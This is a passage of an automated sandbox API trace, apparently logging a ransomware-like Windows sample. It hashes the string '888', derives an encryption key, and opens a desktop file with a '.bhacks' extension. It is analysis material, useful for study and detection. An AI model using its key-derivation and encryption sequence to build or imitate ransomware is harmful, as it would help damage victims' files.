WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.669] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beab0) returned 1 [0101.669] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.669] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.669] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.670] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.670] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0101.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.670] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0101.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.671] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.671] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.671] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.671] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.671] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.671] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.671] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.671] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.672] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.672] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.672] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.672] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.672] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.672] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.672] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.672] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.672] CryptCreateHash (in: hProv=0x9beab0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0101.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.672] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0101.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.673] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9da8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.673] CryptHashData (hHash=0x9a3b80, pbData=0x2a71a78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0101.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.673] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.673] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.673] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9c58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.674] CryptDeriveKey (in: hProv=0x9beab0, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4780) returned 1 [0101.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.674] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.674] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.674] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.674] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.674] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.675] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0101.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/JkNoq.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.675] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.676] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0101.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.677] 